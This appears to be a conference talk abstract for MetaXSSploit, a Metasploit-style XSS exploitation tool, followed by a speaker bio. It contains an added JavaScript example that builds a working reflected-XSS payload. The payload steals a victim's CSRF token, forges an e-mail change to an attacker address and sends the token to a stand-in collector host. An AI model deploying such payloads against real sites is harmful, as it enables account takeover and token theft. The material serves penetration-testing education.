MetaXSSploit: Bringing XSS to Pentesting
Let’s face it: XSS is now the most common vulnerability we identify. More or less every piece of software has one, and they also make for nice filler in any pentest report. However, penetration testers and auditors seldom manage to actually use an XSS, and most reports just show the sad alert popup as the XSS proof of concept.
With MetaXSSploit we try to do more, proposing a new pluggable Metasploit-based architecture that acts as an integration point for some of your favourite tools, bringing web application pentesting, with a focus on the poor XSS vulnerabilities, to an industrial state of exploitation. MetaXSSploit can be used by pentesters and auditors as a means to streamline the use and improve the effectiveness of XSS vulnerabilities, also leveraging a large library of already discovered XSS vulnerabilities in stock applications, with attack modules closely resembling those of Metasploit.
In this talk, we present the creation of MetaXSSploit, from the idea to the automatic generation of the initial library of 1000 exploits from Bugtraq, and from the coding of the first payload to the integration with other web application testing tools. It will be a journey through how the tool was imagined, coded, tested, submitted to conferences and released. We will also present the web application we developed to automatically create MetaXSSploit modules and advisories starting from the attack vector, our shot at the XSS spam we see in security mailing lists.
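As an added illustration of the difference between an alert popup and an XSS that is actually used (example code written for this page, not code from the talk or from MetaXSSploit): the payload below, run in a victim's browser, reads the page's anti-CSRF token, performs a state-changing request in the victim's session and reports the outcome, while the second function wraps it into a reflected-XSS attack vector for a vulnerable parameter. The target host, the `q` parameter, the form selector, the token field name and the collector URL are all constructed, hypothetical values.

```javascript
// Added example, not MetaXSSploit code. All hosts, parameters and field names are assumptions.

// Build the JavaScript that runs in the victim's browser: grab the anti-CSRF token from a
// form on the page, POST a state-changing request with it, then report status and token to
// an attacker-controlled collector via an image request (a fire-and-forget exfil channel).
function buildPayload(opts) {
  const { action, formSelector, tokenField, fields, collector } = opts;
  const body = Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
  // JSON.stringify produces valid JS string literals, so no value can break out of the script.
  return [
    "(function(){",
    `var f=document.querySelector(${JSON.stringify(formSelector)});`,
    `var t=f?f.elements[${JSON.stringify(tokenField)}].value:"";`,
    "var x=new XMLHttpRequest();",
    `x.open("POST",${JSON.stringify(action)},true);`,
    `x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");`,
    "x.onload=function(){",
    `(new Image()).src=${JSON.stringify(collector)}+"?s="+x.status+"&t="+encodeURIComponent(t);`,
    "};",
    `x.send(${JSON.stringify(body)}+"&"+encodeURIComponent(${JSON.stringify(tokenField)})+"="+encodeURIComponent(t));`,
    "})();",
  ].join("");
}

// Turn the payload into a reflected-XSS attack vector. Assumes (hypothetically) that the
// server echoes the raw parameter value into the HTML body, so a <script> tag executes.
function buildReflectedUrl(base, param, payload) {
  // A literal "</script>" inside the payload would close the injected tag early in the HTML
  // parser; escape the slash so the JS parser still sees the same string.
  const safe = payload.replace(/<\/script/gi, "<\\/script");
  const vector = `<script>${safe}</script>`;
  const u = new URL(base);
  u.searchParams.set(param, vector); // percent-encodes <, >, quotes and friends
  return u.toString();
}

// Constructed usage: change the victim's e-mail address instead of popping an alert.
const payload = buildPayload({
  action: "/account/email",
  formSelector: "form#settings",
  tokenField: "csrf_token",
  fields: { email: "attacker@example.com" },
  collector: "https://collector.example/log",
});
const url = buildReflectedUrl("https://target.example/search", "q", payload);
console.log(url);
```

The payload only needs the victim to load the link while logged in; the collector then receives the HTTP status of the forged request and the token that was used, which is the kind of evidence a report can show instead of a popup.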
About Claudio Criscione
Claudio Criscione is a security test engineer at Google. Before joining the company in 2011, Claudio was a penetration tester for most of his career, assessing the security of large infrastructures as well as holding roles in web application security and virtualization security. He has authored a number of tools, including attack tools, and prides himself on being vaporware-free whenever possible. He has a master’s degree in Computer Engineering from the Politecnico di Milano, where he graduated magna cum laude.